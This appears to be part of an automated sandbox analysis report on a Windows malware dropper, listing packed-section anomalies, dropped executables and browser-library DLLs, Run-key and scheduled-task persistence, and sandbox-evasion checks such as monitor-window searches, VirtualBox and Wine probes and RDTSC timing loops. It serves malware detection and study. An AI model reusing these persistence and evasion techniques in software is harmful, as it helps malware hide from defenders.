Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Unpacked PE file: 26.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Unpacked PE file: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: b0b9f39429.exe.7.dr Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: random[1].exe.7.dr Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: real checksum: 0x2b7d41 should be: 0x2bb395
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: e192e43b61.exe.7.dr Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: file.exe Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: num[1].exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: gmhlytvb
Source: file.exe Static PE information: section name: oycggmgz
Source: file.exe Static PE information: section name: .taggant
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name:
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: .idata
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: rlkngmqk
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: jjmnbtpn
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: .taggant
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: ujtayirb
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: rmnowbou
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: .taggant
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: .rsrc
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: .idata
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: rhebxyzr
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: gzayextq
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: ujtayirb
Source: skotes.exe.4.dr Static PE information: section name: rmnowbou
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: freebl3.dll.6.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr Static PE information: section name: .didat
Source: nss3.dll.6.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr Static PE information: section name: .00cfg
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name: gmhlytvb
Source: random[1].exe.7.dr Static PE information: section name: oycggmgz
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: e192e43b61.exe.7.dr Static PE information: section name:
Source: e192e43b61.exe.7.dr Static PE information: section name: .rsrc
Source: e192e43b61.exe.7.dr Static PE information: section name: .idata
Source: e192e43b61.exe.7.dr Static PE information: section name: gmhlytvb
Source: e192e43b61.exe.7.dr Static PE information: section name: oycggmgz
Source: e192e43b61.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: rhebxyzr
Source: random[1].exe0.7.dr Static PE information: section name: gzayextq
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: b0b9f39429.exe.7.dr Static PE information: section name:
Source: b0b9f39429.exe.7.dr Static PE information: section name: .rsrc
Source: b0b9f39429.exe.7.dr Static PE information: section name: .idata
Source: b0b9f39429.exe.7.dr Static PE information: section name:
Source: b0b9f39429.exe.7.dr Static PE information: section name: rhebxyzr
Source: b0b9f39429.exe.7.dr Static PE information: section name: gzayextq
Source: b0b9f39429.exe.7.dr Static PE information: section name: .taggant
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: .idata
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: ujtayirb
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: rmnowbou
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: .taggant
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: .rsrc
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: .idata
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: rhebxyzr
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: gzayextq
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0177A4FA push eax; iretd 0_3_0177A539
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0177A56C pushad ; iretd 0_3_0177A56D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01785FE6 push ebp; iretd 0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01785A4E push ds; ret 0_3_01785A62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05E23967 push ecx; ret 0_3_05E23968
Source: file.exe Static PE information: section name: entropy: 7.982112788144997
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: entropy: 7.811229692376571
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: entropy: 7.983548363166369
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.983548363166369
Source: skotes.exe.4.dr Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: random[1].exe.7.dr Static PE information: section name: entropy: 7.982112788144997
Source: e192e43b61.exe.7.dr Static PE information: section name: entropy: 7.982112788144997
Source: random[1].exe0.7.dr Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: b0b9f39429.exe.7.dr Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: entropy: 7.983548363166369
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File created: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5576D6 second address: 5576F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F40B515FC06h 0x0000000b jmp 00007F40B515FC00h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5576F1 second address: 557705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 557705 second address: 557725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F40B515FBFDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F40B515FC18h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 557725 second address: 557729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54EFFC second address: 54F008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F008 second address: 54F00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F00C second address: 54F010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F010 second address: 54F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F016 second address: 54F046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B515FC06h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F40B515FC00h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A272 second address: 55A28B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jl 00007F40B477E794h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F40B477E786h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A2ED second address: 55A2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A2F3 second address: 55A3A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E788h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, 327Ah 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F40B477E788h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 86692ABCh 0x00000034 jmp 00007F40B477E797h 0x00000039 add dword ptr [esp], 7996D5C4h 0x00000040 add edx, dword ptr [ebp+122D38E9h] 0x00000046 push 00000003h 0x00000048 or dword ptr [ebp+122D3755h], esi 0x0000004e push 00000000h 0x00000050 jmp 00007F40B477E799h 0x00000055 push 00000003h 0x00000057 call 00007F40B477E790h 0x0000005c jmp 00007F40B477E78Ch 0x00000061 pop ecx 0x00000062 movzx edi, si 0x00000065 push 89954B9Fh 0x0000006a je 00007F40B477E794h 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A3A3 second address: 55A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B515FBF6h 0x0000000a popad 0x0000000b xor dword ptr [esp], 49954B9Fh 0x00000012 mov di, 5CECh 0x00000016 call 00007F40B515FBFBh 0x0000001b mov ecx, edx 0x0000001d pop edi 0x0000001e lea ebx, dword ptr [ebp+1244F1B3h] 0x00000024 xchg eax, ebx 0x00000025 jnl 00007F40B515FBFEh 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A508 second address: 55A522 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F40B477E786h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F40B477E788h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A522 second address: 55A539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A539 second address: 55A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A639 second address: 55A63E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
